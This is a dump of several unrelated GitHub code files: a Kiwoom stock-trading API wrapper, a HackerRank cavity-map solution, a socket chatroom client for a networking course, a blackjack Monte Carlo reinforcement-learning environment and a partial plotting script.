idx, '하한가')]\n # add['시가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '시가')]\n # add['고가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '고가')]\n # add['저가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '저가')]\n # add['종가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '종가')]\n # add['체결시간'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '체결시간')]\n # add['예상체결가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '예상체결가')]\n # add['예상체결량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '예상체결량')]\n # add['자본금'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '자본금')]\n # add['액면가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '액면가')]\n # add['시가총액'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '시가총액')]\n # add['주식수'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '주식수')]\n # add['호가시간'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '호가시간')]\n # add['일자'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '일자')]\n # add['우선매도잔량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '우선매도잔량')]\n # add['우선매수잔량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '우선매수잔량')]\n # add['우선매도건수'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '우선매도건수')]\n # add['우선매수건수'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '우선매수건수')]\n # add['총매도잔량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '총매도잔량')]\n # add['총매수잔량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '총매수잔량')]\n # add['총매도건수'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '총매도건수')]\n # add['총매수건수'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '총매수건수')]\n \n # for idx, key in enumerate(add.keys()):\n # if idx in [0, 1]:\n # continue\n # if idx in [6, 10, 11]:\n # add[key] = float(add[key][0])\n # add[key] = int(add[key][0])\n\n print('\\n\\n_optkwfid request received: \\n', add)\n \n # df_name, df = self._df_generator('관심종목', self.stockcode_non_realtime, add)\n # self._data_to_sql('관심종목', df_name+'.db', df)\n # print('\\n\\n_optkwfid request received:\\n', self.tr_data[df_name]) \n # self.tr_data[df_name] = pd.DataFrame()\n \n def _get_comm_data(self, trcode, rqname, idx, itemname):\n return self.dynamicCall('GetCommData(QString, QString, int, QSTring)', trcode, rqname, idx, itemname).strip()\n\n def request_daily_chart(self, stock, date, pricetype=1):\n '''\n stock: 주식종목명\n date: 일자 YYYYMMDD\n pricetype: 1.유상증자 2.무상증자 4.배당락 8.액면분할 16.액면병합 32.기업합병 64.감자 256.권리락\n '''\n stockcode = self.all_stocks[stock]\n self.stockcode_non_realtime = stockcode \n self.requesting_time_unit = '' \n self.set_input_value('종목코드', stockcode)\n self.set_input_value('기준일자', date)\n self.set_input_value('수정주가구분', pricetype)\n self.comm_rq_data('OPT10081', 'opt10081', 0, '0001')\n\n while self.remaining_data == True:\n time.sleep(TR_REQ_TIME_INTERVAL)\n self.set_input_value('종목코드', stockcode)\n self.set_input_value('기준일자', date)\n self.set_input_value('수정주가구분', pricetype)\n self.comm_rq_data('OPT10081', 'opt10081', 2, '0002')\n\n def request_minute_chart(self, stock, mintime=30, pricetype=1):\n '''\n stock: name of a stock\n mintime: one of 1, 3, 5, 10, 15, 30, 45, 60 \n pricetype: 1.유상증자 2.무상증자 4.배당락 8.액면분할 16.액면병합 32.기업합병 64.감자 256.권리락\n '''\n stockcode = self.all_stocks[stock]\n self.stockcode_non_realtime = stockcode \n self.requesting_time_unit = str(mintime)+'분'\n self.set_input_value('종목코드', stockcode)\n self.set_input_value('틱범위', mintime)\n self.set_input_value('수정주가구분', pricetype)\n self.comm_rq_data('OPT10080', 'opt10080', 0, '0003')\n\n while self.remaining_data == True:\n time.sleep(TR_REQ_TIME_INTERVAL)\n self.set_input_value('종목코드', stockcode)\n self.set_input_value('틱범위', mintime)\n self.set_input_value('수정주가구분', pricetype)\n self.comm_rq_data('OPT10080', 'opt10080', 2, '0004')\n \n def request_tick_chart(self, stock, ticktime=1, pricetype=1):\n '''\n stock: name of a stock\n ticktime: one of 1, 3, 5, 10, 30\n pricetype: 1.유상증자 2.무상증자 4.배당락 8.액면분할 16.액면병합 32.기업합병 64.감자 256.권리락\n '''\n stockcode = self.all_stocks[stock]\n self.stockcode_non_realtime = stockcode \n self.requesting_time_unit = str(ticktime)+'틱'\n self.set_input_value('종목코드', stockcode)\n self.set_input_value('틱범위', ticktime)\n self.set_input_value('수정주가구분', pricetype)\n self.comm_rq_data('OPT10079', 'opt10079', 0, '0003')\n\n while self.remaining_data == True:\n time.sleep(TR_REQ_TIME_INTERVAL)\n self.set_input_value('종목코드', stockcode)\n self.set_input_value('틱범위', ticktime)\n self.set_input_value('수정주가구분', pricetype)\n self.comm_rq_data('OPT10079', 'opt10079', 2, '0004')\n \n def request_mass_data(self, *stocklist, prenext=0):\n code_list = ''\n codecnt = len(stocklist)\n for idx, stock in enumerate(stocklist):\n if idx == 0:\n code_list += self.all_stocks[stock]\n else:\n code_list += ';'+self.all_stocks[stock] #CommKwRqData() receives multiple stock tickers as one string separated with ;\n print('\\n\\nRequesting the real time data of the following tickers: ', code_list)\n self.comm_kw_rq_data(code_list, prenext, codecnt, typeflag=0, rqname='OPTKWFID', scrno='0005')\n \n def request_real_data(self, codelist, fidlist, opttype='1', scrno='0100'): \n self.set_real_data(scrno, codelist, fidlist, opttype)\n \n def make_order(self, stock, price, qty, hogagb='00', ordertype=1, orderno=' '):\n '''\n stock: 주식이름\n price: 주문가격\n qty: 주문수량\n hogagb: 거래구분(혹은 호가구분) \n '00':'지정가', '03':'시장가', '05':'조건부지정가', '06':'최유리지정가', '07':'최우선지정가', '10':'지정가IOC', '13':'시장가IOC',\n '16':'최유리IOC', '20':'지정가FOK', '23':'시장가FOK', '26':'최유리FOK', '61':'장전시간외종가', '62':'시간외단일가매매', '81':'장후시간외종가'\n ordertype: 주문유형 1:신규매수(default), 2:신규매도 3:매수취소, 4:매도취소, 5:매수정정, 6:매도정정 \n orderno: 원주문번호. 신규주문에는 공백 입력, 정정/취소시 입력합니다. \n '''\n stockcode = self.all_stocks[stock]\n self.stockcode_non_realtime = stockcode\n print('\\nself.account_num, ordertype, stockcode, qty, price, hogagb, orderno:\\n', self.account_num, ordertype, stockcode, qty, price, hogagb, orderno)\n self.set_order('testuser', '0006', self.account_num, ordertype, stockcode, qty, price, hogagb, orderno)\n \n \napp = QApplication(sys.argv)\n\nkiwoom = Kiwoom()\n\ntype(kiwoom.account_num)\n\n\n# kiwoom.make_order('삼성전자', 61000, 1, '03')\n# kiwoom.request_minute_chart('삼성전자', 30)\nkiwoom.request_daily_chart('삼성전자', '20221123')\n# kiwoom.request_mass_data('삼성전자', 'NAVER', '컬러레이', '현대차', '카카오', 'LG에너지솔루션')\n\n# print(kiwoom.all_stocks)\n","repo_name":"codebummer/Kiwoom-Trading-Take-1","sub_path":"kiwoom2.4.py","file_name":"kiwoom2.4.py","file_ext":"py","file_size_in_byte":32385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"35711255333","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the cavityMap function below.\ndef cavityMap(grid):\n #small grid cases, no cavities possible\n if(len(grid)<3):\n return grid\n\n grid = [[a for a in line] for line in grid]\n\n for i in range(1, len(grid)-1):\n for j in range(1, len(grid)-1):\n if(not checkSide(grid, (i, j), -1, 0)):\n continue\n if(not checkSide(grid, (i, j), 1, 0)):\n continue\n if(not checkSide(grid, (i, j), 0, 1)):\n continue\n if(not checkSide(grid, (i, j), 0, -1)):\n continue\n grid[i][j] = \"X\"\n\n print(grid)\n\n return [\"\".join(line) for line in grid]\n\ndef checkSide(arr, a, i_shift, j_shift):\n i = a[0]\n j = a[1]\n if(arr[i+i_shift][j+j_shift]!='X'):\n if(int(arr[i][j])>int(arr[i+i_shift][j+j_shift])):\n return True\n return False\n\n\n\n# print(dayOfProgrammer(2016))\n# print(dayOfProgrammer(2017))\n","repo_name":"Gendo90/HackerRank","sub_path":"Basic Algorithms/cavityMap.py","file_name":"cavityMap.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"18189978074","text":"#!/usr/bin/python\r\n# version=2020/12/16\r\nimport sys # to use the argv\r\nimport socket, select\r\nimport os\r\nimport queue # for the queue threading\r\nimport time\r\nimport datetime\r\n\r\nimport tty\r\nimport termios\r\nuser = \"\"\r\nstatus = \"\"\r\nchat_addr = ()\r\nowner_chat_addr = ()\r\n\r\n\"\"\"\r\nHow to use NonBlockingConsole:\r\nwith NonBlockingConsole() as nbc:\r\n\twhile True:\r\n\t\tnbc.get_data() # to get the console input nonblockingly\r\n\"\"\"\r\nclass NonBlockingConsole(object):\r\n\t\r\n\tdef __enter__(self):\r\n\t\tself.old_settings = termios.tcgetattr(sys.stdin)\r\n\t\ttty.setcbreak(sys.stdin.fileno()) # sys.stdin.fileno() == 0 ( stdout == 1, stderr == 2)\r\n\t\treturn self\r\n\r\n\tdef __exit__(self, type, value, traceback):\r\n\t\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.old_settings)\r\n\r\n\r\n\tdef get_data(self):\r\n\t\tif select.select([sys.stdin], [], [], 0) == ([sys.stdin], [], []):\r\n\t\t\treturn sys.stdin.read(1)\r\n\t\treturn False\r\n\r\n## struct structure\r\nclass log:\r\n\t#__slots__ = [name, time, content]\r\n\tdef __init__(self,**data):\r\n\t\tself.__dict__.update(data)\r\n\r\ndef create_chat(addr, owner):\r\n\r\n\t# to get the system time of hour and minutes\r\n\tdef get_time():\r\n\t\th_m = time.strftime(\"%H %M\", time.localtime())\r\n\t\th = h_m.split()[0]\r\n\t\tm = h_m.split()[1]\r\n\t\treturn h, m\r\n\t\t\r\n\tserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\tserver.setblocking(0)\r\n\tserver.bind(addr)\r\n\tserver.listen(15) # at least 10 client\r\n\t\r\n\tinputs = [server]\r\n\toutputs = []\r\n\tmessage_queues = {}\t\r\n\tclients = []\r\n\tusers = {}\r\n\thistory = []\r\n\tif_owner_first = True\r\n\tclose_chatroom = False\r\n\t\r\n\t# print(\"Wait for connection... \")\r\n\twhile inputs:\r\n\t\treadable, writable, exceptional = select.select(\r\n\t\t\tinputs, outputs, inputs)\r\n\t\t## readable\r\n\t\tfor s in readable:\r\n\t\t\tif s is server:\r\n\t\t\t\tconn, addr = s.accept()\r\n\t\t\t\tconn.setblocking(0)\r\n\t\t\t\tinputs.append(conn)\r\n\t\t\t\tclients.append(conn)\r\n\t\t\t\tmessage_queues[conn] = queue.Queue()\r\n\t\t\t\t# welcome \r\n\t\t\t\twelcome = \"********************************\\n\"+\\\r\n\t\t\t\t\t\t\t\"** Welcome to the chatroom. **\\n\"+\\\r\n\t\t\t\t\t\t\t\"********************************\"\r\n\t\t\t\tif len(history) != 0:\r\n\t\t\t\t\tfor i in range(len(history)):\r\n\t\t\t\t\t\twelcome += \"\\n\" + history[i]\r\n\t\t\t\tmessage_queues[conn].put(welcome)\r\n\t\t\t\tif conn not in outputs:\r\n\t\t\t\t\toutputs.append(conn)\r\n\t\t\t\t\t\r\n\t\t\telse:\r\n\t\t\t\tdata = str(s.recv(1024), encoding='utf-8')\t\t\t\t\r\n\t\t\t\tif data:\r\n\t\t\t\t\t\r\n\t\t\t\t\tif \"leave-chatroom\" == data:\r\n\t\t\t\t\t\tif owner == users[s]:\r\n\t\t\t\t\t\t\tclose_chatroom = True\r\n\t\t\t\t\t\tmessage = \"Welcome back to BBS.\"\r\n\t\t\t\t\t\tmessage_queues[s].put(message)\r\n\t\t\t\t\t\tif s not in outputs:\r\n\t\t\t\t\t\t\toutputs.append(s)\r\n\t\t\t\t\t\r\n\t\t\t\t\telif \"detach\" == data and owner == users[s]:\r\n\t\t\t\t\t\tif s in outputs:\r\n\t\t\t\t\t\t\toutputs.remove(s)\r\n\t\t\t\t\t\tinputs.remove(s)\r\n\t\t\t\t\t\tif s in clients:\r\n\t\t\t\t\t\t\tclients.remove(s)\r\n\t\t\t\t\t\ts.close()\r\n\t\t\t\t\t\tdel message_queues[s]\r\n\t\t\r\n\t\t\t\t\telif \"sys\" in data:\r\n\t\t\t\t\t\tuser = data.split()[1]\r\n\t\t\t\t\t\tusers[s] = user\r\n\t\t\t\t\t\tif user==owner and if_owner_first==False:\r\n\t\t\t\t\t\t\tpass\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\thour, min = get_time()\r\n\t\t\t\t\t\t\tsys = \"sys[%s:%s]:%s join us.\"%(hour, min, user)\r\n\t\t\t\t\t\t\tfor client in clients:\r\n\t\t\t\t\t\t\t\tif client != s:\r\n\t\t\t\t\t\t\t\t\tmessage_queues[client].put(sys)\r\n\t\t\t\t\t\t\t\t\tif client not in outputs:\r\n\t\t\t\t\t\t\t\t\t\toutputs.append(client)\r\n\t\t\t\t\t\tif if_owner_first:\r\n\t\t\t\t\t\t\tif_owner_first = False\r\n\t\t\t\t\t\t\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\thour, min = get_time()\r\n\t\t\t\t\t\tmessage = \"%s[%s:%s]:%s\"%(users[s], hour, min, data)\r\n\t\t\t\t\t\tif len(history) < 3:\r\n\t\t\t\t\t\t\thistory.append(message)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tdel history[0]\r\n\t\t\t\t\t\t\thistory.append(message)\r\n\t\t\t\t\t\tfor client in clients:\r\n\t\t\t\t\t\t\tif client != s:\r\n\t\t\t\t\t\t\t\tmessage_queues[client].put(message)\r\n\t\t\t\t\t\t\t\tif client not in outputs:\r\n\t\t\t\t\t\t\t\t\toutputs.append(client)\r\n\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t# no message receive\r\n\t\t\t\telse:\r\n\t\t\t\t\tif s in outputs:\r\n\t\t\t\t\t\toutputs.remove(s)\r\n\t\t\t\t\tinputs.remove(s)\r\n\t\t\t\t\ts.close()\r\n\t\t\t\t\tdel message_queues[s]\r\n\t\t\r\n\t\t## writable \r\n\t\tfor s in writable:\r\n\t\t\ttry:\r\n\t\t\t\tnext_msg = message_queues[s].get_nowait()\r\n\t\t\texcept queue.Empty:\r\n\t\t\t\toutputs.remove(s)\r\n\t\t\telse:\r\n\t\t\t\ts.sendall(next_msg.encode())\r\n\t\t\t\t\r\n\t\t\t\t## close the chatroom socket server\r\n\t\t\t\tif close_chatroom == True:\r\n\t\t\t\t\thour, min = get_time()\r\n\t\t\t\t\tsys = \"sys[%s:%s]:the chatroom is close.\\nWelcome back to BBS.\"%(hour, min)\r\n\t\t\t\t\tfor client in clients:\r\n\t\t\t\t\t\tif client != s:\r\n\t\t\t\t\t\t\tmessage_queues[client].put(sys)\r\n\t\t\t\t\t\t\tif client not in outputs:\r\n\t\t\t\t\t\t\t\toutputs.append(client)\r\n\t\t\t\t\tif s in outputs:\r\n\t\t\t\t\t\toutputs.remove(s)\r\n\t\t\t\t\tinputs.remove(s)\r\n\t\t\t\t\tif s in clients:\r\n\t\t\t\t\t\tclients.remove(s)\r\n\t\t\t\t\ts.close()\r\n\t\t\t\t\tdel message_queues[s]\r\n\t\t\t\t\tclose_chatroom = False\r\n\t\t\t\t\r\n\t\t\t\t## close the chatroom socket client connection\r\n\t\t\t\telif next_msg == \"Welcome back to BBS.\":\r\n\t\t\t\t\t# send the leave message\r\n\t\t\t\t\thour, min = get_time()\r\n\t\t\t\t\tsys = \"sys[%s:%s]:%s leave us.\"%(hour, min, users[s])\r\n\t\t\t\t\tfor client in clients:\r\n\t\t\t\t\t\tif client != s:\r\n\t\t\t\t\t\t\tmessage_queues[client].put(sys)\r\n\t\t\t\t\t\t\tif client not in outputs:\r\n\t\t\t\t\t\t\t\toutputs.append(client)\r\n\t\t\t\t\t# after sending leave message, cloes the connection\t\t\r\n\t\t\t\t\tif s in outputs:\r\n\t\t\t\t\t\toutputs.remove(s)\r\n\t\t\t\t\tinputs.remove(s)\r\n\t\t\t\t\tif s in clients:\r\n\t\t\t\t\t\tclients.remove(s)\r\n\t\t\t\t\ts.close()\r\n\t\t\t\t\tdel message_queues[s]\r\n\t\t\t\t\r\n\t\t\t\t## leave-chatroom the condition of non-owner\r\n\t\t\t\telif \"Welcome back to BBS.\" in next_msg:\r\n\t\t\t\t\tif s in outputs:\r\n\t\t\t\t\t\toutputs.remove(s)\r\n\t\t\t\t\tinputs.remove(s)\r\n\t\t\t\t\tif s in clients:\r\n\t\t\t\t\t\tclients.remove(s)\r\n\t\t\t\t\ts.close()\r\n\t\t\t\t\tdel message_queues[s]\r\n\r\n\t\t## exceptional\r\n\t\tfor s in exceptional:\r\n\t\t\tinputs.remove(s)\r\n\t\t\tif s in outputs:\r\n\t\t\t\toutputs.remove(s)\r\n\t\t\ts.close()\r\n\t\t\tdel message_queues[s]\r\n\t\t\t\r\ndef join_chatroom(addr, owner, if_wel):\r\n\tglobal user, status, chat_addr\r\n\tchat_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\tchat_s.connect(addr)\r\n\t# recv welcome\r\n\twel = str(chat_s.recv(1024), encoding='utf-8')\r\n\tif if_wel:\r\n\t\tprint(wel)\r\n\tchat_s.sendall((\"sys %s\"%user).encode())\r\n\tchat_s.setblocking(0)\t\r\n\tchat_s.settimeout(0.01)\r\n\t\r\n\tmsgs = \"\"\r\n\twith NonBlockingConsole() as nbc:\r\n\t\twhile True:\r\n\t\t\ttry:\r\n\t\t\t\tdata = str(chat_s.recv(1024), encoding='utf-8')\r\n\t\t\t\tprint(data)\r\n\t\t\t\tif \"Welcome back to BBS.\" in data:\r\n\t\t\t\t\tchat_s.close()\r\n\t\t\t\t\tbreak\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\t\t\tmsg = nbc.get_data() # to get the console input nonblockingly\r\n\t\t\tif msg and ord(msg)==10:\r\n\t\t\t\t# print(\"ENTER\")\r\n\t\t\t\tif msgs == \"detach\" and owner:\r\n\t\t\t\t\tchat_s.sendall(msgs.encode())\r\n\t\t\t\t\tchat_s.close()\r\n\t\t\t\t\t# sys.stdout.write('\\n')\r\n\t\t\t\t\tprint(msgs)\r\n\t\t\t\t\tprint(\"Welcome back to BBS.\")\r\n\t\t\t\t\tmsgs=\"\"\r\n\t\t\t\t\tbreak\r\n\t\t\t\telif msgs == \"leave-chatroom\" and owner:\r\n\t\t\t\t\tstatus = \"close\"\r\n\t\t\t\t\tchat_s.sendall(msgs.encode())\r\n\t\t\t\t\t# sys.stdout.write('\\n')\r\n\t\t\t\t\tprint(msgs)\r\n\t\t\t\t\tmsgs=\"\"\r\n\t\t\t\telse:\r\n\t\t\t\t\t# msgs = user + \" \" + msgs\r\n\t\t\t\t\tchat_s.sendall(msgs.encode())\r\n\t\t\t\t\t# sys.stdout.write('\\n')\r\n\t\t\t\t\tprint(msgs)\r\n\t\t\t\t\tmsgs=\"\"\r\n\t\t\telif msg:\r\n\t\t\t\tmsgs += msg\r\n\r\ndef command(cmd, s, u, addr):\r\n\tglobal user, status, chat_addr, owner_chat_addr\r\n\t## hw1 command\r\n\t# udp\r\n\tif cmd == \"whoami\" or \"register\" in cmd:\r\n\t\ts.sendall(\"udp\".encode())\r\n\t\tu.sendto( cmd.encode(), addr)\r\n\t\tdata, _ = u.recvfrom(1024)\r\n\t\tprint(str(data, encoding='utf-8'))\r\n\t\t\r\n\t# tcp\r\n\telif \"login\" in cmd:\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tprint(data)\r\n\t\tif \"Welcome\" in data:\r\n\t\t\tcmd = cmd.split()\r\n\t\t\tuser = cmd[1].strip()\r\n\r\n\telif cmd == \"logout\":\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tprint(data)\r\n\t\tif \"Bye\" in data:\r\n\t\t\tuser = \"\"\r\n\t\t\r\n\telif cmd==\"list-user\":\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tprint(data)\r\n\r\n\t## hw2 command\r\n\telif \"create-board\" in cmd or \"create-post\" in cmd or \"list-board\" in cmd \\\r\n\t\tor \"list-post\" in cmd or \"read\" in cmd or \"delete-post\" in cmd or \"update-post\" in cmd \\\r\n\t\tor \"comment\" in cmd:\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tprint(data)\r\n\t\t\r\n\t## hw3 command\r\n\telif \"create-chatroom\" in cmd:\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tprint(data)\r\n\t\tstatus = \"open\"\r\n\t\tif \"start to create\" in data:\r\n\t\t\tcmd = cmd.split()\r\n\t\t\towner_chat_addr = (addr[0], int(cmd[1]))\r\n\t\t\tpid = os.fork()\r\n\t\t\tif pid == -1:\r\n\t\t\t\tsys.exit(\"fork error\")\r\n\t\t\telif pid == 0:\r\n\t\t\t\t# child process\r\n\t\t\t\tcreate_chat(owner_chat_addr, user)\r\n\t\t\telse:\r\n\t\t\t\ttime.sleep(0.01)\r\n\t\t\t\tjoin_chatroom(owner_chat_addr, True, True)\r\n\t\t\t\tif status == \"close\":\r\n\t\t\t\t\ts.sendall( \"leave-chatroom\".encode())\r\n\t\t\t\t\r\n\telif \"list-chatroom\" == cmd: # list-chatroom use udp to do\r\n\t\ts.sendall(\"udp\".encode())\r\n\t\tu.sendto( cmd.encode(), addr)\r\n\t\tdata, _ = u.recvfrom(1024)\r\n\t\tprint(str(data, encoding='utf-8'))\r\n\telif \"join-chatroom\" in cmd:\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tif data.find(\"addr\") == -1:\r\n\t\t\tprint(data)\r\n\t\telse:\r\n\t\t\tchat_addr = (data[data.find(\"addr\")+4:data.find(\"port\")].strip(),\\\r\n\t\t\t\tint(data[data.find(\"port\")+4:].strip()))\r\n\t\t\tjoin_chatroom(chat_addr, False, True)\r\n\t\t\t\r\n\telif \"attach\" == cmd:\r\n\t\tif user == \"\":\r\n\t\t\tprint(\"Please login first.\")\r\n\t\telif status == \"\":\r\n\t\t\tprint(\"Please create-chatroom first.\")\r\n\t\telif status == \"close\":\r\n\t\t\tprint(\"Please restart-chatroom first.\")\r\n\t\telse:\r\n\t\t\tprint(\"Welcome to the chatroom.\")\r\n\t\t\tjoin_chatroom(owner_chat_addr, True, True)\r\n\t\t\tif status == \"close\":\r\n\t\t\t\ts.sendall( \"leave-chatroom\".encode())\r\n\t\t\r\n\telif \"restart-chatroom\" == cmd:\r\n\t\ts.sendall(cmd.encode())\r\n\t\tdata = str(s.recv(1024), encoding='utf-8')\r\n\t\tprint(data)\r\n\t\tif data == \"start to create chatroom...\":\r\n\t\t\tstatus = \"open\"\r\n\t\t\tjoin_chatroom(owner_chat_addr, True, True)\r\n\t\t\tif status == \"close\":\r\n\t\t\t\ts.sendall( \"leave-chatroom\".encode())\r\n\t\t\r\nif __name__ == \"__main__\":\r\n\t## the host and service\r\n\tif len(sys.argv) != 3:\r\n\t\tsys.exit(\"iter_tcp_client.py {host} {portnumber}\")\r\n\telse:\r\n\t\tport = int(sys.argv[2])\r\n\t\thost = sys.argv[1]\r\n\taddr = (host, port)\r\n\r\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\tu = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\ts.connect(addr)\r\n\r\n\t# recv welcome\r\n\twel = str(s.recv(1024), encoding='utf-8')\r\n\tprint(wel)\r\n\t\r\n\twhile True:\r\n\t\tcmd = input(\"% \")\r\n\t\t# print(\"Test input: %s\" % cmd)\r\n\t\t\r\n\t\tif cmd==\"exit\":\r\n\t\t\ts.sendall(cmd.encode())\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tcommand(cmd, s, u, addr)\r\n\ts.close()\r\n\tu.close()","repo_name":"KJ-black/Introduce-Network-Programming","sub_path":"HW3/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"7509927560","text":"import json\nd=dict(name='Bob',age=20,score=88)\nL=json.dumps(d)\nprint(L)\n\n# class Student(object):\n# def __init__(self,name,age,score):\n# self.name = name\n# self.age = age\n# self.score =score\n# def Student2dict(std):\n# return {\n# 'name':std.name,\n# 'age':std.age,\n# 'score':std.score\n# }\n# # dict(name=self.name,age=self.age,score=self.score)\n \n# s= Student('Bob',20,88)\n# print(json.dumps(s,default=lambda obj : obj.__dict__))\n\n","repo_name":"xiaoanya/python_base","sub_path":"json_.py","file_name":"json_.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"13558494612","text":"import itertools\nimport random\n\nfrom tqdm import tqdm\n\nfrom blackjack.blackjack_state import BlackjackState, BustBlackjackState\nfrom blackjack.score_calculator import ScoreCalculator\nfrom blackjack.utility import log\n\nBUST = 'b'\nUSABLE_A = 'a'\nNO_USABLE_A = 'na'\n\n\nclass BlackjackEnvironment:\n def __init__(self, ):\n self.stats = {\n USABLE_A: list(self.create_state_list(True)),\n NO_USABLE_A: list(self.create_state_list(False)),\n BUST: BustBlackjackState()\n }\n self.current_stat = None\n self.state_gone_through = None\n self.start_state_new_episode()\n\n @staticmethod\n def create_state_list(have_usable_a):\n for i in range(1, 11):\n yield [BlackjackState(j, i, have_usable_a, name='dealer: {} --- player: {} ---- usable_a: {}'.format(i, j, have_usable_a)) for j in\n range(11, 22)]\n\n def monte_carlo_es(self):\n for _ in tqdm(range(500000)):\n reward = self.execute_one_episode()\n self.settle_reward(reward)\n self.start_state_new_episode()\n\n def execute_one_episode(self):\n log.debug('start')\n while True:\n log.debug(self.current_stat)\n is_end, reward = self.play()\n log.debug('reward={}'.format(reward))\n if is_end:\n log.debug('end')\n return reward\n # self.update_reward(reward)\n # break\n\n def play(self):\n action = self.current_stat.get_next_action()\n if action.is_stick():\n return True, self.current_stat.get_reward()\n else:\n self.update_next_state()\n return False, 0\n\n def update_next_state(self):\n self.current_stat = self._get_next_state(self.current_stat)\n self.go_through_state(self.current_stat)\n\n def go_through_state(self, state):\n self.state_gone_through.append(state)\n\n def _get_next_state(self, stat: BlackjackState):\n player_cards = stat.get_cards()\n player_cards.append(stat.hit())\n calculator = ScoreCalculator(player_cards)\n player_sum = calculator.calculate()\n return self._get_state(calculator.have_usable_a(), stat.dealer_show, player_sum)\n\n def _get_state(self, have_usable_a, dealer_show, player_sum):\n if player_sum > 21:\n return self.stats[BUST]\n if have_usable_a:\n return self.stats[USABLE_A][dealer_show - 1][player_sum - 11]\n return self.stats[NO_USABLE_A][dealer_show - 1][player_sum - 11]\n\n def update_reward(self, reward):\n log.debug('start update')\n for state in self.state_gone_through:\n state.update_reward(reward)\n log.debug(state)\n log.debug('end update')\n\n def start_state_new_episode(self):\n self.current_stat = self.new_random_state()\n self.state_gone_through = [self.current_stat]\n\n def new_random_state(self):\n stats = list(itertools.chain.from_iterable(self.stats[USABLE_A] + self.stats[NO_USABLE_A]))\n state = stats[random.randint(0, len(stats) - 1)]\n state.choose_random_policy()\n return state\n\n def settle_reward(self, reward):\n self.update_reward(reward)\n for state in self.state_gone_through:\n state.choose_next_policy()\n\n def print(self):\n self._print(self.stats[USABLE_A])\n self._print(self.stats[NO_USABLE_A])\n\n def _print(self, states):\n stats = list(itertools.chain.from_iterable(states))\n for state in stats:\n log.log(state)\n\n def get_result(self, flag):\n for dealer_show in self.stats[flag]:\n yield [player_sum.get_result() for player_sum in dealer_show]\n\n\n","repo_name":"boydfd/reinforcement_learning","sub_path":"src/blackjack/blackjack_environment.py","file_name":"blackjack_environment.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"28813584307","text":"import glob\nimport os\nimport numpy as np\nimport scipy\n\nfrom utils.plot import plot_reward\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport matplotlib\nfrom matplotlib.font_manager import FontProperties\n\ndef read_data(rootdir, qos, hotel=False):\n mean_cpu = {}\n max_cpu = {}\n\n tail_latencies = {}\n violation_rates = {}\n\n for _, dirs, _ in os.walk(rootdir):\n for subdir in sorted(dirs, key=lambda x: (len(x), x)):\n key = int(subdir)\n\n # get mean/max action\n action_file = os.path.join(rootdir, subdir, 'core_allocation_sum.txt')\n if not os.path.isfile(action_file): #compat with old naming\n action_file = os.path.join(rootdir, subdir, 'action_sum.txt')\n\n\n with open(action_file, 'r') as f:\n all_cpu_allocations = [float(x) for x in f.readline().strip().split(',') if x]\n\n mean_cpu[key] = np.mean(all_cpu_allocations)\n max_cpu[key] = np.max(all_cpu_allocations)\n\n # get violation rate\n single_exp_tail_latencies = []\n\n if hotel:\n name = 'hotel_stats_history.csv'\n else:\n name = 'social_stats_history.csv'\n \n with open(os.path.join(rootdir, subdir, name), 'r') as f:\n lines = f.readlines()\n assert len(lines) > 1\n fields = lines[0].split(',')\n\n # \"Timestamp\",\"User 